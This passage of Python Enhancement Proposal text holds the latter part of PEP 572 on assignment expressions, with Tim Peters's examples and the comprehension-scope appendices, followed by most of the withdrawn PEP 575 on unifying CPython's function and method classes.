between if (x == y) and if (x = y) belies their drastically different
semantics. Thus this proposal uses := to clarify the distinction.
With assignment expressions, why bother with assignment statements?
The two forms have different flexibilities. The := operator can be used
inside a larger expression; the = statement can be augmented to += and
its friends, can be chained, and can assign to attributes and subscripts.
Why not use a sublocal scope and prevent namespace pollution?
Previous revisions of this proposal involved sublocal scope (restricted to a
single statement), preventing name leakage and namespace pollution. While a
definite advantage in a number of situations, this increases complexity in
many others, and the costs are not justified by the benefits. In the interests
of language simplicity, the name bindings created here are exactly equivalent
to any other name bindings, including that usage at class or module scope will
create externally-visible names. This is no different from for loops or
other constructs, and can be solved the same way: del the name once it is
no longer needed, or prefix it with an underscore.
(The author wishes to thank Guido van Rossum and Christoph Groth for their
suggestions to move the proposal in this direction. [2])
Style guide recommendations
As expression assignments can sometimes be used equivalently to statement
assignments, the question of which should be preferred will arise. For the
benefit of style guides such as PEP 8, two recommendations are suggested.
If either assignment statements or assignment expressions can be
used, prefer statements; they are a clear declaration of intent.
If using assignment expressions would lead to ambiguity about
execution order, restructure it to use statements instead.
Acknowledgements
The authors wish to thank Alyssa Coghlan and Steven D’Aprano for their
considerable contributions to this proposal, and members of the
core-mentorship mailing list for assistance with implementation.
Appendix A: Tim Peters’s findings
Here’s a brief essay Tim Peters wrote on the topic.
I dislike “busy” lines of code, and also dislike putting conceptually
unrelated logic on a single line. So, for example, instead of:
i = j = count = nerrors = 0
I prefer:
i = j = 0
count = 0
nerrors = 0
instead. So I suspected I’d find few places I’d want to use
assignment expressions. I didn’t even consider them for lines already
stretching halfway across the screen. In other cases, “unrelated”
ruled:
mylast = mylast[1]
yield mylast[0]
is a vast improvement over the briefer:
yield (mylast := mylast[1])[0]
The original two statements are doing entirely different conceptual
things, and slamming them together is conceptually insane.
In other cases, combining related logic made it harder to understand,
such as rewriting:
while True:
old = total
total += term
if old == total:
return total
term *= mx2 / (i*(i+1))
i += 2
as the briefer:
while total != (total := total + term):
term *= mx2 / (i*(i+1))
i += 2
return total
The while test there is too subtle, crucially relying on strict
left-to-right evaluation in a non-short-circuiting or method-chaining
context. My brain isn’t wired that way.
But cases like that were rare. Name binding is very frequent, and
“sparse is better than dense” does not mean “almost empty is better
than sparse”. For example, I have many functions that return None
or 0 to communicate “I have nothing useful to return in this case,
but since that’s expected often I’m not going to annoy you with an
exception”. This is essentially the same as regular expression search
functions returning None when there is no match. So there was lots
of code of the form:
result = solution(xs, n)
if result:
# use result
I find that clearer, and certainly a bit less typing and
pattern-matching reading, as:
if result := solution(xs, n):
# use result
It’s also nice to trade away a small amount of horizontal whitespace
to get another _line_ of surrounding code on screen. I didn’t give
much weight to this at first, but it was so very frequent it added up,
and I soon enough became annoyed that I couldn’t actually run the
briefer code. That surprised me!
There are other cases where assignment expressions really shine.
Rather than pick another from my code, Kirill Balunov gave a lovely
example from the standard library’s copy() function in copy.py:
reductor = dispatch_table.get(cls)
if reductor:
rv = reductor(x)
else:
reductor = getattr(x, "__reduce_ex__", None)
if reductor:
rv = reductor(4)
else:
reductor = getattr(x, "__reduce__", None)
if reductor:
rv = reductor()
else:
raise Error("un(shallow)copyable object of type %s" % cls)
The ever-increasing indentation is semantically misleading: the logic
is conceptually flat, “the first test that succeeds wins”:
if reductor := dispatch_table.get(cls):
rv = reductor(x)
elif reductor := getattr(x, "__reduce_ex__", None):
rv = reductor(4)
elif reductor := getattr(x, "__reduce__", None):
rv = reductor()
else:
raise Error("un(shallow)copyable object of type %s" % cls)
Using easy assignment expressions allows the visual structure of the
code to emphasize the conceptual flatness of the logic;
ever-increasing indentation obscured it.
A smaller example from my code delighted me, both allowing to put
inherently related logic in a single line, and allowing to remove an
annoying “artificial” indentation level:
diff = x - x_base
if diff:
g = gcd(diff, n)
if g > 1:
return g
became:
if (diff := x - x_base) and (g := gcd(diff, n)) > 1:
return g
That if is about as long as I want my lines to get, but remains easy
to follow.
So, in all, in most lines binding a name, I wouldn’t use assignment
expressions, but because that construct is so very frequent, that
leaves many places I would. In most of the latter, I found a small
win that adds up due to how often it occurs, and in the rest I found a
moderate to major win. I’d certainly use it more often than ternary
if, but significantly less often than augmented assignment.
A numeric example
I have another example that quite impressed me at the time.
Where all variables are positive integers, and a is at least as large
as the n’th root of x, this algorithm returns the floor of the n’th
root of x (and roughly doubling the number of accurate bits per
iteration):
while a > (d := x // a**(n-1)):
a = ((n-1)*a + d) // n
return a
It’s not obvious why that works, but is no more obvious in the “loop
and a half” form. It’s hard to prove correctness without building on
the right insight (the “arithmetic mean - geometric mean inequality”),
and knowing some non-trivial things about how nested floor functions
behave. That is, the challenges are in the math, not really in the
coding.
If you do know all that, then the assignment-expression form is easily
read as “while the current guess is too large, get a smaller guess”,
where the “too large?” test and the new guess share an expensive
sub-expression.
To my eyes, the original form is harder to understand:
while True:
d = x // a**(n-1)
if a <= d:
break
a = ((n-1)*a + d) // n
return a
Appendix B: Rough code translations for comprehensions
This appendix attempts to clarify (though not specify) the rules when
a target occurs in a comprehension or in a generator expression.
For a number of illustrative examples we show the original code,
containing a comprehension, and the translation, where the
comprehension has been replaced by an equivalent generator function
plus some scaffolding.
Since [x for ...] is equivalent to list(x for ...) these
examples all use list comprehensions without loss of generality.
And since these examples are meant to clarify edge cases of the rules,
they aren’t trying to look like real code.
Note: comprehensions are already implemented via synthesizing nested
generator functions like those in this appendix. The new part is
adding appropriate declarations to establish the intended scope of
assignment expression targets (the same scope they resolve to as if
the assignment were performed in the block containing the outermost
comprehension). For type inference purposes, these illustrative
expansions do not imply that assignment expression targets are always
Optional (but they do indicate the target binding scope).
Let’s start with a reminder of what code is generated for a generator
expression without assignment expression.
Original code (EXPR usually references VAR):def f():
a = [EXPR for VAR in ITERABLE]
Translation (let’s not worry about name conflicts):def f():
def genexpr(iterator):
for VAR in iterator:
yield EXPR
a = list(genexpr(iter(ITERABLE)))
Let’s add a simple assignment expression.
Original code:def f():
a = [TARGET := EXPR for VAR in ITERABLE]
Translation:def f():
if False:
TARGET = None # Dead code to ensure TARGET is a local variable
def genexpr(iterator):
nonlocal TARGET
for VAR in iterator:
TARGET = EXPR
yield TARGET
a = list(genexpr(iter(ITERABLE)))
Let’s add a global TARGET declaration in f().
Original code:def f():
global TARGET
a = [TARGET := EXPR for VAR in ITERABLE]
Translation:def f():
global TARGET
def genexpr(iterator):
global TARGET
for VAR in iterator:
TARGET = EXPR
yield TARGET
a = list(genexpr(iter(ITERABLE)))
Or instead let’s add a nonlocal TARGET declaration in f().
Original code:def g():
TARGET = ...
def f():
nonlocal TARGET
a = [TARGET := EXPR for VAR in ITERABLE]
Translation:def g():
TARGET = ...
def f():
nonlocal TARGET
def genexpr(iterator):
nonlocal TARGET
for VAR in iterator:
TARGET = EXPR
yield TARGET
a = list(genexpr(iter(ITERABLE)))
Finally, let’s nest two comprehensions.
Original code:def f():
a = [[TARGET := i for i in range(3)] for j in range(2)]
# I.e., a = [[0, 1, 2], [0, 1, 2]]
print(TARGET) # prints 2
Translation:def f():
if False:
TARGET = None
def outer_genexpr(outer_iterator):
nonlocal TARGET
def inner_generator(inner_iterator):
nonlocal TARGET
for i in inner_iterator:
TARGET = i
yield i
for j in outer_iterator:
yield list(inner_generator(range(3)))
a = list(outer_genexpr(range(2)))
print(TARGET)
Appendix C: No Changes to Scope Semantics
Because it has been a point of confusion, note that nothing about Python’s
scoping semantics is changed. Function-local scopes continue to be resolved
at compile time, and to have indefinite temporal extent at run time (“full
closures”). Example:
a = 42
def f():
# `a` is local to `f`, but remains unbound
# until the caller executes this genexp:
yield ((a := i) for i in range(3))
yield lambda: a + 100
print("done")
try:
print(f"`a` is bound to {a}")
assert False
except UnboundLocalError:
print("`a` is not yet bound")
Then:
>>> results = list(f()) # [genexp, lambda]
done
`a` is not yet bound
# The execution frame for f no longer exists in CPython,
# but f's locals live so long as they can still be referenced.
>>> list(map(type, results))
[<class 'generator'>, <class 'function'>]
>>> list(results[0])
[0, 1, 2]
>>> results[1]()
102
>>> a
42
References
[1]
Proof of concept implementation
(https://github.com/Rosuav/cpython/tree/assignment-expressions)
[2]
Pivotal post regarding inline assignment semantics
(https://mail.python.org/pipermail/python-ideas/2018-March/049409.html)
[3]
Discussion of PEP 572 TargetScopeError
(https://mail.python.org/archives/list/[email protected]/thread/FXVSYCTQOTT7JCFACKPGPXKULBCGEPQY/)
Copyright
This document has been placed in the public domain.
| Final | PEP 572 – Assignment Expressions | Standards Track | This is a proposal for creating a way to assign to variables within an
expression using the notation NAME := expr. |
PEP 575 – Unifying function/method classes
Author:
Jeroen Demeyer <J.Demeyer at UGent.be>
Status:
Withdrawn
Type:
Standards Track
Created:
27-Mar-2018
Python-Version:
3.8
Post-History:
31-Mar-2018, 12-Apr-2018, 27-Apr-2018, 05-May-2018
Table of Contents
Withdrawal notice
Abstract
Motivation
New classes
base_function
cfunction
defined_function
function
bound_method
Calling base_function instances
Checking __objclass__
Flags
Self slicing
METH_PASS_FUNCTION
METH_FASTCALL
Automatic creation of built-in functions
Unbound methods of extension types
Built-in functions of a module
Further changes
New type flag
C API functions
Changes to the types module
Changes to the inspect module
Profiling
Non-CPython implementations
Rationale
Why not simply change existing classes?
Why __text_signature__ is not a solution
defined_function versus function
Scope of this PEP: which classes are involved?
Not treating METH_STATIC and METH_CLASS
__self__ in base_function
Two implementations of __doc__
Subclassing
Replacing tp_call: METH_PASS_FUNCTION and METH_CALL_UNBOUND
Backwards compatibility
Changes to types and inspect
Python functions
Built-in functions of a module
Built-in bound and unbound methods
New attributes
method_descriptor and PyDescr_NewMethod
Two-phase Implementation
Phase one: keep existing classes but add base classes
Phase two
Reference Implementation
Appendix: current situation
builtin_function_or_method: built-in functions and bound methods
method_descriptor: built-in unbound methods
function: Python functions
method: Python bound methods
References
Copyright
Withdrawal notice
See PEP 580 for a better solution to allowing fast calling of custom classes.
See PEP 579 for a broader discussion of some of the other issues from this PEP.
Abstract
Reorganize the class hierarchy for functions and methods
with the goal of reducing the difference between
built-in functions (implemented in C) and Python functions.
Mainly, make built-in functions behave more like Python functions
without sacrificing performance.
A new base class base_function is introduced and the various function
classes, as well as method (renamed to bound_method), inherit from it.
We also allow subclassing the Python function class.
Motivation
Currently, CPython has two different function classes:
the first is Python functions, which is what you get
when defining a function with def or lambda.
The second is built-in functions such as len, isinstance or numpy.dot.
These are implemented in C.
These two classes are implemented completely independently and have different functionality.
In particular, it is currently not possible to implement a function efficiently in C
(only built-in functions can do that)
while still allowing introspection like inspect.signature or inspect.getsourcefile
(only Python functions can do that).
This is a problem for projects like Cython [1] that want to do exactly that.
In Cython, this was worked around by inventing a new function class called cyfunction.
Unfortunately, a new function class creates problems:
the inspect module does not recognize such functions as being functions [2]
and the performance is worse
(CPython has specific optimizations for calling built-in functions).
A second motivation is more generally making built-in functions and methods
behave more like Python functions and methods.
For example, Python unbound methods are just functions but
unbound methods of extension types (e.g. dict.get) are a distinct class.
Bound methods of Python classes have a __func__ attribute,
bound methods of extension types do not.
Third, this PEP allows great customization of functions.
The function class becomes subclassable and custom function
subclasses are also allowed for functions implemented in C.
In the latter case, this can be done with the same performance
as true built-in functions.
All functions can access the function object
(the self in __call__), paving the way for PEP 573.
New classes
This is the new class hierarchy for functions and methods:
object
|
|
base_function
/ | \
/ | \
/ | defined_function
/ | \
cfunction (*) | \
| function
|
bound_method (*)
The two classes marked with (*) do not allow subclassing;
the others do.
There is no difference between functions and unbound methods,
while bound methods are instances of bound_method.
base_function
The class base_function becomes a new base class for all function types.
It is based on the existing builtin_function_or_method class,
but with the following differences and new features:
It acts as a descriptor implementing __get__ to turn a function into a method
if m_self is NULL.
If m_self is not NULL,
then this is a no-op: the existing function is returned instead.
A new read-only attribute __parent__, represented in the C structure as m_parent.
If this attribute exists, it represents the defining object.
For methods of extension types, this is the defining class (__class__ in plain Python)
and for functions of a module, this is the defining module.
In general, it can be any Python object.
If __parent__ is a class, it carries special semantics:
in that case, the function must be called with self being an instance of that class.
Finally, __qualname__ and __reduce__ will use __parent__
as namespace (instead of __self__ before).
A new attribute __objclass__ which equals __parent__ if __parent__
is a class. Otherwise, accessing __objclass__ raises AttributeError.
This is meant to be backwards compatible with method_descriptor.
The field ml_doc and the attributes __doc__ and
__text_signature__ (see Argument Clinic)
are not supported.
A new flag METH_PASS_FUNCTION for ml_flags.
If this flag is set, the C function stored in ml_meth is called with
an additional first argument equal to the function object.
A new flag METH_BINDING for ml_flags which only applies to
functions of a module (not methods of a class).
If this flag is set, then m_self is set to NULL instead
of the module.
This allows the function to behave more like a Python function
as it enables __get__.
A new flag METH_CALL_UNBOUND to disable self slicing.
A new flag METH_PYTHON for ml_flags.
This flag indicates that this function should be treated as Python function.
Ideally, use of this flag should be avoided because it goes
against the duck typing philosophy.
It is still needed in a few places though, for example profiling.
The goal of base_function is that it supports all different ways
of calling functions and methods in just one structure.
For example, the new flag METH_PASS_FUNCTION
will be used by the implementation of methods.
It is not possible to directly create instances of base_function
(tp_new is NULL).
However, it is legal for C code to manually create instances.
These are the relevant C structures:
PyTypeObject PyBaseFunction_Type;
typedef struct {
PyObject_HEAD
PyCFunctionDef *m_ml; /* Description of the C function to call */
PyObject *m_self; /* __self__: anything, can be NULL; readonly */
PyObject *m_module; /* __module__: anything (typically str) */
PyObject *m_parent; /* __parent__: anything, can be NULL; readonly */
PyObject *m_weakreflist; /* List of weak references */
} PyBaseFunctionObject;
typedef struct {
const char *ml_name; /* The name of the built-in function/method */
PyCFunction ml_meth; /* The C function that implements it */
int ml_flags; /* Combination of METH_xxx flags, which mostly
describe the args expected by the C func */
} PyCFunctionDef;
Subclasses may extend PyCFunctionDef with extra fields.
The Python attribute __self__ returns m_self,
except if METH_STATIC is set.
In that case or if m_self is NULL,
then there is no __self__ attribute at all.
For that reason, we write either m_self or __self__ in this PEP
with slightly different meanings.
cfunction
This is the new version of the old builtin_function_or_method class.
The name cfunction was chosen to avoid confusion with “built-in”
in the sense of “something in the builtins module”.
It also fits better with the C API which use the PyCFunction prefix.
The class cfunction is a copy of base_function, with the following differences:
m_ml points to a PyMethodDef structure,
extending PyCFunctionDef with an additional ml_doc
field to implement __doc__ and __text_signature__
as read-only attributes:typedef struct {
const char *ml_name;
PyCFunction ml_meth;
int ml_flags;
const char *ml_doc;
} PyMethodDef;
Note that PyMethodDef is part of the Python Stable ABI
and it is used by practically all extension modules,
so we absolutely cannot change this structure.
Argument Clinic is supported.
__self__ always exists. In the cases where base_function.__self__
would raise AttributeError, instead None is returned.
The type object is PyTypeObject PyCFunction_Type
and we define PyCFunctionObject as alias of PyBaseFunctionObject
(except for the type of m_ml).
defined_function
The class defined_function is an abstract base class meant
to indicate that the function has introspection support.
Instances of defined_function are required to support all attributes
that Python functions have, namely
__code__, __globals__, __doc__,
__defaults__, __kwdefaults__, __closure__ and __annotations__.
There is also a __dict__ to support attributes added by the user.
None of these is required to be meaningful.
In particular, __code__ may not be a working code object,
possibly only a few fields may be filled in.
This PEP does not dictate how the various attributes are implemented.
They may be simple struct members or more complicated descriptors.
Only read-only support is required, none of the attributes is required to be writable.
The class defined_function is mainly meant for auto-generated C code,
for example produced by Cython [1].
There is no API to create instances of it.
The C structure is the following:
PyTypeObject PyDefinedFunction_Type;
typedef struct {
PyBaseFunctionObject base;
PyObject *func_dict; /* __dict__: dict or NULL */
} PyDefinedFunctionObject;
TODO: maybe find a better name for defined_function.
Other proposals: inspect_function (anything that satisfies inspect.isfunction),
builtout_function (a function that is better built out; pun on builtin),
generic_function (original proposal but conflicts with functools.singledispatch generic functions),
user_function (defined by the user as opposed to CPython).
function
This is the class meant for functions implemented in Python.
Unlike the other function types,
instances of function can be created from Python code.
This is not changed, so we do not describe the details in this PEP.
The layout of the C structure is the following:
PyTypeObject PyFunction_Type;
typedef struct {
PyBaseFunctionObject base;
PyObject *func_dict; /* __dict__: dict or NULL */
PyObject *func_code; /* __code__: code */
PyObject *func_globals; /* __globals__: dict; readonly */
PyObject *func_name; /* __name__: string */
PyObject *func_qualname; /* __qualname__: string */
PyObject *func_doc; /* __doc__: can be anything or NULL */
PyObject *func_defaults; /* __defaults__: tuple or NULL */
PyObject *func_kwdefaults; /* __kwdefaults__: dict or NULL */
PyObject *func_closure; /* __closure__: tuple of cell objects or NULL; readonly */
PyObject *func_annotations; /* __annotations__: dict or NULL */
PyCFunctionDef _ml; /* Storage for base.m_ml */
} PyFunctionObject;
The descriptor __name__ returns func_name.
When setting __name__, also base.m_ml->ml_name is updated
with the UTF-8 encoded name.
The _ml field reserves space to be used by base.m_ml.
A base_function instance must have the flag METH_PYTHON set
if and only if it is an instance of function.
When constructing an instance of function from code and globals,
an instance is created with base.m_ml = &_ml,
base.m_self = NULL.
To make subclassing easier, we also add a copy constructor:
if f is an instance of function, then types.FunctionType(f) copies f.
This conveniently allows using a custom function type as decorator:
>>> from types import FunctionType
>>> class CustomFunction(FunctionType):
... pass
>>> @CustomFunction
... def f(x):
... return x
>>> type(f)
<class '__main__.CustomFunction'>
This also removes many use cases of functools.wraps:
wrappers can be replaced by subclasses of function.
bound_method
The class bound_method is used for all bound methods,
regardless of the class of the underlying function.
It adds one new attribute on top of base_function:
__func__ points to that function.
bound_method replaces the old method class
which was used only for Python functions bound as method.
There is a complication because we want to allow
constructing a method from an arbitrary callable.
This may be an already-bound method or simply not an instance of base_function.
Therefore, in practice there are two kinds of methods:
For arbitrary callables, we use a single fixed PyCFunctionDef
structure with the METH_PASS_FUNCTION flag set.
For methods which bind instances of base_function
(more precisely, which have the Py_TPFLAGS_BASEFUNCTION flag set)
that have self slicing,
we instead use the PyCFunctionDef from the original function.
This way, we don’t lose any performance when calling bound methods.
In this case, the __func__ attribute is only used to implement
various attributes but not for calling the method.
When constructing a new method from a base_function,
we check that the self object is an instance of __objclass__
(if a class was specified as parent) and raise a TypeError otherwise.
The C structure is:
PyTypeObject PyMethod_Type;
typedef struct {
PyBaseFunctionObject base;
PyObject *im_func; /* __func__: function implementing the method; readonly */
} PyMethodObject;
Calling base_function instances
We specify the implementation of __call__ for instances of base_function.
Checking __objclass__
First of all, a type check is done if the __parent__ of the function
is a class
(recall that __objclass__ then becomes an alias of __parent__):
if m_self is NULL (this is the case for unbound methods of extension types),
then the function must be called with at least one positional argument
and the first (typically called self) must be an instance of __objclass__.
If not, a TypeError is raised.
Note that bound methods have m_self != NULL, so the __objclass__
is not checked.
Instead, the __objclass__ check is done when constructing the method.
Flags
For convenience, we define a new constant:
METH_CALLFLAGS combines all flags from PyCFunctionDef.ml_flags
which specify the signature of the C function to be called.
It is equal to
METH_VARARGS | METH_FASTCALL | METH_NOARGS | METH_O | METH_KEYWORDS | METH_PASS_FUNCTION
Exactly one of the first four flags above must be set
and only METH_VARARGS and METH_FASTCALL may be combined with METH_KEYWORDS.
Violating these rules is undefined behaviour.
There are one new flags which affects calling functions,
namely METH_PASS_FUNCTION and METH_CALL_UNBOUND.
Some flags are already documented in [5].
We explain the others below.
Self slicing
If the function has m_self == NULL and the flag METH_CALL_UNBOUND
is not set, then the first positional argument (if any)
is removed from *args and instead passed as first argument to the C function.
Effectively, the first positional argument is treated as __self__.
This is meant to support unbound methods
such that the C function does not see the difference
between bound and unbound method calls.
This does not affect keyword arguments in any way.
This process is called self slicing and a function is said to
have self slicing if m_self == NULL and METH_CALL_UNBOUND is not set.
Note that a METH_NOARGS function which has self slicing
effectively has one argument, namely self.
Analogously, a METH_O function with self slicing has two arguments.
METH_PASS_FUNCTION
If this flag is set, then the C function is called with an
additional first argument, namely the function itself
(the base_function instance).
As special case, if the function is a bound_method,
then the underlying function of the method is passed
(but not recursively: if a bound_method wraps a bound_method,
then __func__ is only applied once).
For example, an ordinary METH_VARARGS function has signature
(PyObject *self, PyObject *args).
With METH_VARARGS | METH_PASS_FUNCTION, this becomes
(PyObject *func, PyObject *self, PyObject *args).
METH_FASTCALL
This is an existing but undocumented flag.
We suggest to officially support and document it.
If the flag METH_FASTCALL is set without METH_KEYWORDS,
then the ml_meth field is of type PyCFunctionFast
which takes the arguments (PyObject *self, PyObject *const *args, Py_ssize_t nargs).
Such a function takes only positional arguments and they are passed as plain C array
args of length nargs.
If the flags METH_FASTCALL | METH_KEYWORDS are set,
then the ml_meth field is of type PyCFunctionFastKeywords
which takes the arguments (PyObject *self, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames).
The positional arguments are passed as C array args of length nargs.
The values of the keyword arguments follow in that array,
starting at position nargs.
The keys (names) of the keyword arguments are passed as a tuple in kwnames.
As an example, assume that 3 positional and 2 keyword arguments are given.
Then args is an array of length 3 + 2 = 5, nargs equals 3 and kwnames is a 2-tuple.
Automatic creation of built-in functions
Python automatically generates instances of cfunction
for extension types (using the PyTypeObject.tp_methods field) and modules
(using the PyModuleDef.m_methods field).
The arrays PyTypeObject.tp_methods and PyModuleDef.m_methods
must be arrays of PyMethodDef structures.
Unbound methods of extension types
The type of unbound methods changes from method_descriptor
to cfunction.
The object which appears as unbound method is the same object which
appears in the class __dict__.
Python automatically sets the __parent__ attribute to the defining class.
Built-in functions of a module
For the case of functions of a module,
__parent__ will be set to the module.
Unless the flag METH_BINDING is given, also __self__
will be set to the module (for backwards compatibility).
An important consequence is that such functions by default
do not become methods when used as attribute
(base_function.__get__ only does that if m_self was NULL).
One could consider this a bug, but this was done for backwards compatibility reasons:
in an initial post on python-ideas [6] the consensus was to keep this
misfeature of built-in functions.
However, to allow this anyway for specific or newly implemented
built-in functions, the METH_BINDING flag prevents setting __self__.
Further changes
New type flag
A new PyTypeObject flag (for tp_flags) is added:
Py_TPFLAGS_BASEFUNCTION to indicate that instances of this type are
functions which can be called and bound as method like a base_function.
This is different from flags like Py_TPFLAGS_LIST_SUBCLASS
because it indicates more than just a subclass:
it also indicates a default implementation of __call__ and __get__.
In particular, such subclasses of base_function
must follow the implementation from the section Calling base_function instances.
This flag is automatically set for extension types which
inherit the tp_call and tp_descr_get implementation from base_function.
Extension types can explicitly specify it if they
override __call__ or __get__ in a compatible way.
The flag Py_TPFLAGS_BASEFUNCTION must never be set for a heap type
because that would not be safe (heap types can be changed dynamically).
C API functions
We list some relevant Python/C API macros and functions.
Some of these are existing (possibly changed) functions, some are new:
int PyBaseFunction_CheckFast(PyObject *op): return true if op
is an instance of a class with the Py_TPFLAGS_BASEFUNCTION set.
This is the function that you need to use to determine
whether it is meaningful to access the base_function internals.
int PyBaseFunction_Check(PyObject *op): return true if op
is an instance of base_function.
PyObject *PyBaseFunction_New(PyTypeObject *cls, PyCFunctionDef *ml, PyObject *self, PyObject *module, PyObject *parent):
create a new instance of cls (which must be a subclass of base_function)
from the given data.
int PyCFunction_Check(PyObject *op): return true if op
is an instance of cfunction.
int PyCFunction_NewEx(PyMethodDef* ml, PyObject *self, PyObject* module):
create a new instance of cfunction.
As special case, if self is NULL,
then set self = Py_None instead (for backwards compatibility).
If self is a module, then __parent__ is set to self.
Otherwise, __parent__ is NULL.
For many existing PyCFunction_... and PyMethod_ functions,
we define a new function PyBaseFunction_...
acting on base_function instances.
The old functions are kept as aliases of the new functions.
int PyFunction_Check(PyObject *op): return true if op
is an instance of base_function with the METH_PYTHON flag set
(this is equivalent to checking whether op is an instance of function).
int PyFunction_CheckFast(PyObject *op): equivalent to
PyFunction_Check(op) && PyBaseFunction_CheckFast(op).
int PyFunction_CheckExact(PyObject *op): return true
if the type of op is function.
PyObject *PyFunction_NewPython(PyTypeObject *cls, PyObject *code, PyObject *globals, PyObject *name, PyObject *qualname):
create a new instance of cls (which must be a subclass of function)
from the given data.
PyObject *PyFunction_New(PyObject *code, PyObject *globals):
create a new instance of function.
PyObject *PyFunction_NewWithQualName(PyObject *code, PyObject *globals, PyObject *qualname):
create a new instance of function.
PyObject *PyFunction_Copy(PyTypeObject *cls, PyObject *func):
create a new instance of cls (which must be a subclass of function)
by copying a given function.
Changes to the types module
Two types are added: types.BaseFunctionType corresponding to
base_function and types.DefinedFunctionType corresponding to
defined_function.
Apart from that, no changes to the types module are made.
In particular, types.FunctionType refers to function.
However, the actual types will change:
in particular, types.BuiltinFunctionType will no longer be the same
as types.BuiltinMethodType.
Changes to the inspect module
The new function inspect.isbasefunction checks for an instance of base_function.
inspect.isfunction checks for an instance of defined_function.
inspect.isbuiltin checks for an instance of cfunction.
inspect.isroutine checks isbasefunction or ismethoddescriptor.
NOTE: bpo-33261 [3] should be fixed first.
Profiling
Currently, sys.setprofile supports c_call, c_return and c_exception
events for built-in functions.
These events are generated when calling or returning from a built-in function.
By contrast, the call and return events are generated by the function itself.
So nothing needs to change for the call and return events.
Since we no longer make a difference between C functions and Python functions,
we need to prevent the c_* events for Python functions.
This is done by not generating those events if the
METH_PYTHON flag in ml_flags is set.
Non-CPython implementations
Most of this PEP is only relevant to CPython.
For other implementations of Python,
the two changes that are required are the base_function base class
and the fact that function can be subclassed.
The classes cfunction and defined_function are not required.
We require base_function for consistency but we put no requirements on it:
it is acceptable if this is just a copy of object.
Support for the new __parent__ (and __objclass__) attribute is not required.
If there is no defined_function class,
then types.DefinedFunctionType should be an alias of types.FunctionType.
Rationale
Why not simply change existing classes?
One could try to solve the problem by keeping the existing classes
without introducing a new base_function class.
That might look like a simpler solution but it is not:
it would require introspection support for 3 distinct classes:
function, builtin_function_or_method and method_descriptor.
For the latter two classes, “introspection support” would mean
at a minimum allowing subclassing.
But we don’t want to lose performance, so we want fast subclass checks.
This would require two new flags in tp_flags.
And we want subclasses to allow __get__ for built-in functions,
so we should implement the LOAD_METHOD opcode for built-in functions too.
More generally, a lot of functionality would need to be duplicated
and the end result would be far more complex code.
It is also not clear how the introspection of built-in function subclasses
would interact with __text_signature__.
Having two independent kinds of inspect.signature support on the same
class sounds like asking for problems.
And this would not fix some of the other differences between built-in functions
and Python functions that were mentioned in the motivation.
Why __text_signature__ is not a solution
Built-in functions have an attribute __text_signature__,
which gives the signature of the function as plain text.
The default values are evaluated by ast.literal_eval.
Because of this, it supports only a small number of standard Python classes
and not arbitrary Python objects.
And even if __text_signature__ would allow arbitrary signatures somehow,
that is only one piece of introspection:
it does not help with inspect.getsourcefile for example.
defined_function versus function
In many places, a decision needs to be made whether the old function class
should be replaced by defined_function or the new function class.
This is done by thinking of the most likely use case:
types.FunctionType refers to function because that
type might be used to construct instances using types.FunctionType(...).
inspect.isfunction() refers to defined_function
because this is the class where introspection is supported.
The C API functions must refer to function because
we do not specify how the various attributes of defined_function
are implemented.
We expect that this is not a problem since there is typically no
reason for introspection to be done by C extensions.
Scope of this PEP: which classes are involved?
The main motivation of this PEP is fixing function classes,
so we certainly want to unify the existing classes
builtin_function_or_method and function.
Since built-in functions and methods have the same class,
it seems natural to include bound methods too.
And since there are no “unbound methods” for Python functions,
it makes sense to get rid of unbound methods for extension types.
For now, no changes are made to the classes staticmethod,
classmethod and classmethod_descriptor.
It would certainly make sense to put these in the base_function
class hierarchy and unify classmethod and classmethod_descriptor.
However, this PEP is already big enough
and this is left as a possible future improvement.
Slot wrappers for extension types like __init__ or __eq__
are quite different from normal methods.
They are also typically not called directly because you would normally
write foo[i] instead of foo.__getitem__(i).
So these are left outside the scope of this PEP.
Python also has an instancemethod class,
which seems to be a relic from Python 2,
where it was used for bound and unbound methods.
It is not clear whether there is still a use case for it.
In any case, there is no reason to deal with it in this PEP.
TODO: should instancemethod be deprecated?
It doesn’t seem used at all within CPython 3.7,
but maybe external packages use it?
Not treating METH_STATIC and METH_CLASS
Almost nothing in this PEP refers to the flags METH_STATIC and METH_CLASS.
These flags are checked only by the automatic creation of built-in functions.
When a staticmethod, classmethod or classmethod_descriptor
is bound (i.e. __get__ is called),
a base_function instance is created with m_self != NULL.
For a classmethod, this is obvious since m_self
is the class that the method is bound to.
For a staticmethod, one can take an arbitrary Python object for m_self.
For backwards compatibility, we choose m_self = __parent__ for static methods
of extension types.
__self__ in base_function
It may look strange at first sight to add the __self__ slot
in base_function as opposed to bound_method.
We took this idea from the existing builtin_function_or_method class.
It allows us to have a single general implementation of __call__ and __get__
for the various function classes discussed in this PEP.
It also makes it easy to support existing built-in functions
which set __self__ to the module (for example, sys.exit.__self__ is sys).
Two implementations of __doc__
base_function does not support function docstrings.
Instead, the classes cfunction and function
each have their own way of dealing with docstrings
(and bound_method just takes the __doc__ from the wrapped function).
For cfunction, the docstring is stored (together with the text signature)
as C string in the read-only ml_doc field of a PyMethodDef.
For function, the docstring is stored as a writable Python object
and it does not actually need to be a string.
It looks hard to unify these two very different ways of dealing with __doc__.
For backwards compatibility, we keep the existing implementations.
For defined_function, we require __doc__ to be implemented
but we do not specify how. A subclass can implement __doc__ the
same way as cfunction or using a struct member or some other way.
Subclassing
We disallow subclassing of cfunction and bound_method
to enable fast type checks for PyCFunction_Check and PyMethod_Check.
We allow subclassing of the other classes because there is no reason to disallow it.
For Python modules, the only relevant class to subclass is
function because the others cannot be instantiated anyway.
Replacing tp_call: METH_PASS_FUNCTION and METH_CALL_UNBOUND
The new flags METH_PASS_FUNCTION and METH_CALL_UNBOUND
are meant to support cases where formerly a custom tp_call was used.
It reduces the number of special fast paths in Python/ceval.c
for calling objects:
instead of treating Python functions, built-in functions and method descriptors
separately, there would only be a single check.
The signature of tp_call is essentially the signature
of PyBaseFunctionObject.m_ml.ml_meth with flags
METH_VARARGS | METH_KEYWORDS | METH_PASS_FUNCTION | METH_CALL_UNBOUND
(the only difference is an added self argument).
Therefore, it should be easy to change existing tp_call slots
to use the base_function implementation instead.
It also makes sense to use METH_PASS_FUNCTION without METH_CALL_UNBOUND
in cases where the C function simply needs access to additional metadata
from the function, such as the __parent__.
This is for example needed to support PEP 573.
Converting existing methods to use METH_PASS_FUNCTION is trivial:
it only requires adding an extra argument to the C function.
Backwards compatibility
While designing this PEP, great care was taken to not break
backwards compatibility too much.
Most of the potentially incompatible changes
are changes to CPython implementation details
